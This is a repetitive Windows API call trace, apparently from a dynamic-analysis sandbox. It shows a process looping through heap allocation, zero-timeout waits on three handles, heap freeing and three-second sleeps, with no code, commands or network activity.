	[0219.817] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777d58) returned 1
	[0219.817] Sleep (dwMilliseconds=0xbb8) 
	[0219.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d58
	[0219.820] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.820] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.820] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.820] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777d58) returned 1
	[0219.820] Sleep (dwMilliseconds=0xbb8) 
	[0219.836] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.836] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.836] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.836] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.836] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.836] Sleep (dwMilliseconds=0xbb8) 
	[0219.851] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.851] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.851] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.852] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.852] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.852] Sleep (dwMilliseconds=0xbb8) 
	[0219.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.867] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.867] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.867] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.867] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.867] Sleep (dwMilliseconds=0xbb8) 
	[0219.883] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.883] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.883] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.883] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.883] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.883] Sleep (dwMilliseconds=0xbb8) 
	[0219.899] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.899] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.899] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.899] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.899] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.899] Sleep (dwMilliseconds=0xbb8) 
	[0219.914] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.914] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.914] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.914] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.914] Sleep (dwMilliseconds=0xbb8) 
	[0219.930] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.930] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.930] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.930] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.930] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.930] Sleep (dwMilliseconds=0xbb8) 
	[0219.945] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.945] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.945] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.945] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.945] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.945] Sleep (dwMilliseconds=0xbb8) 
	[0219.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.961] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.961] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.961] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.961] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.961] Sleep (dwMilliseconds=0xbb8) 
	[0219.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.976] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.976] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.977] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.977] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.977] Sleep (dwMilliseconds=0xbb8) 
	[0219.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.992] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.992] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.992] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.992] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.992] Sleep (dwMilliseconds=0xbb8) 
	[0220.007] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0220.007] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.007] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.007] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.007] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.007] Sleep (dwMilliseconds=0xbb8) 
	[0220.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0220.023] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.023] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.023] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.023] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.023] Sleep (dwMilliseconds=0xbb8) 
	[0220.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0220.039] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.039] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.039] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.039] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.039] Sleep (dwMilliseconds=0xbb8) 
	[0220.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0220.054] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.054] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.054] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.054] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.054] Sleep (dwMilliseconds=0xbb8) 
	[0220.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0220.070] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.070] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.070] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.070] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.070] Sleep (dwMilliseconds=0xbb8) 
	[0220.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0220.086] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.086] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.086] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.086] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.086] Sleep (dwMilliseconds=0xbb8) 
	[0220.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0220.102] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.102] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.102] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.102] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.102] Sleep (dwMilliseconds=0xbb8) 
	[0220.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0220.117] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.117] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.117] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.118] Sleep (dwMilliseconds=0xbb8) 
	[0220.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381f0
	[0220.132] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.132] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.133] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27381f0) returned 1
	[0220.133] Sleep (dwMilliseconds=0xbb8) 
	[0220.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263a28
	[0220.148] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.148] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.148] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.148] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263a28) returned 1
	[0220.148] Sleep (dwMilliseconds=0xbb8) 
	[0220.220] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263a28
	[0220.220] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.220] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.220] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.220] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263a28) returned 1
	[0220.220] Sleep (dwMilliseconds=0xbb8) 
	[0220.228] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.228] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.228] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.228] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.228] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.228] Sleep (dwMilliseconds=0xbb8) 
	[0220.241] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.241] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.241] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.241] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.241] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.242] Sleep (dwMilliseconds=0xbb8) 
	[0220.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.257] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.257] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.257] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.257] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.257] Sleep (dwMilliseconds=0xbb8) 
	[0220.273] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.273] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.273] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.273] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.273] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.273] Sleep (dwMilliseconds=0xbb8) 
	[0220.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.288] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.288] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.288] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.288] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.288] Sleep (dwMilliseconds=0xbb8) 
	[0220.304] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.304] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.304] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.304] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.304] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.304] Sleep (dwMilliseconds=0xbb8) 
	[0220.320] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.320] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.320] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.320] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.320] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.320] Sleep (dwMilliseconds=0xbb8) 
	[0220.335] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.335] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.335] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.335] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.335] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.335] Sleep (dwMilliseconds=0xbb8) 
	[0220.351] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.351] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.351] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.351] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.351] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.351] Sleep (dwMilliseconds=0xbb8) 
	[0220.366] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.366] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.366] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.366] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.366] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.367] Sleep (dwMilliseconds=0xbb8) 
	[0220.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.382] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.382] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.382] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.382] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.382] Sleep (dwMilliseconds=0xbb8) 
	[0220.399] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.400] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.400] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.400] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.400] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.400] Sleep (dwMilliseconds=0xbb8) 
	[0220.413] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.413] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.413] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.413] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.414] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.414] Sleep (dwMilliseconds=0xbb8) 
	[0220.430] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.430] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.430] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.430] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.430] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.431] Sleep (dwMilliseconds=0xbb8) 
	[0220.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.454] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.454] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.454] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.454] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.454] Sleep (dwMilliseconds=0xbb8) 
	[0220.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.460] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.460] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.460] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.460] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.460] Sleep (dwMilliseconds=0xbb8) 
	[0220.475] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.475] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.475] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.475] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.476] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.476] Sleep (dwMilliseconds=0xbb8) 
	[0220.491] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.491] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.491] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.491] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.491] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.491] Sleep (dwMilliseconds=0xbb8) 
	[0220.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.507] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.507] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.507] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.507] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.507] Sleep (dwMilliseconds=0xbb8) 
	[0220.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.522] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.522] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.522] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.522] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.522] Sleep (dwMilliseconds=0xbb8) 
	[0220.538] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.538] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.538] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.538] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.538] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.538] Sleep (dwMilliseconds=0xbb8) 
	[0220.553] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.553] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.553] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.553] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.553] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.553] Sleep (dwMilliseconds=0xbb8) 
	[0220.569] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.569] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.569] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.569] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.569] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.569] Sleep (dwMilliseconds=0xbb8) 
	[0220.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.585] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.585] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.585] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.585] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.585] Sleep (dwMilliseconds=0xbb8) 
	[0220.602] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.602] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.602] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.602] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.602] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.602] Sleep (dwMilliseconds=0xbb8) 
	[0220.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.616] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.616] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.616] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.616] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.616] Sleep (dwMilliseconds=0xbb8) 
	[0220.654] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.654] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.654] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.654] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.654] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.654] Sleep (dwMilliseconds=0xbb8) 
	[0220.663] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.663] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.663] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.663] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.663] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.663] Sleep (dwMilliseconds=0xbb8) 
	[0220.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.726] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.726] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.726] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.726] Sleep (dwMilliseconds=0xbb8) 
